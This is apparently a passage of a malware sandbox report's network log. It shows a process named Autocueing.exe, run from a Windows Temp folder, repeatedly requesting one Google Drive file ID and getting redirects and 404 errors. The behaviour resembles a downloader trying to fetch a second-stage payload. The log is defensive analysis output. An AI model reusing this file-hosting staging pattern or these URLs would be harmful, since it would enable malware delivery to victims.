                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-_jgiY9FppazYHNQ2DfLLwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    11          192.168.2.6  49994        142.250.185.129  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:13 UTC  459                OUT        GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:13 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgRlMbaq1Y-iqeLMwt6QrJy4v5SKHOWTR-YZPgGpYDLvwrF0OCWY4ITMIHnhx5emJdfk
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:13 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-j_T0DR8vgrQB2eDWrjKpjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:13 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Gw68n2w-RjGYM0M0KQwohA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    12          192.168.2.6  49995        142.250.185.142  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:14 UTC  417                OUT        GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:15 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:15 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-AqnC-xDGvCrLQy2D-0ZnPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49996 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:15 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:16 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQLhufAgrAgdh-N9Wh2MKIScDVLvm2cJXzcEsmvz2wxwZNpbMwxPKNQ4cZDpykWxMyn
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:16 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-KQ91EmzVDghX3w5eyMWlgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:16 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mv6ZZsUGVOQSsaeWLViQFQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49997 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:17 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:17 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:17 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-pFtz4nqIgYmgAnKmT-p8ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49998 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:18 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:18 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSzUbDwmVRmlsWZHCApqs9_hTockWhjWVTadlBHnKY69C1wFBCR8nFpIct8O-cEdvP3cwsZ7RI
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:18 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-uzqnJ5y-7flUkm1Axl61Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:18 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-MN4nsjM6HNAV4a973OZ_w">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49999 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:19 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:19 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:19 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-zIGV7XKh8f2Ck4gusevTsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50000 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:20 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:21 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQ2jgYZZqhKKnKkcykpTY4WaDb3A1Mwsz8d3yNeE2WzjZZqX2o4zuRGTK8vmcr_izKe9vVLkX0
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:21 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-KVjUz6AGEt_5sIzzr-XOBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:21 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="slRYeBLQiJQqlJlj4mppmA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50001 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:22 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:22 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-_87piI0JTVBG7vluM053yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
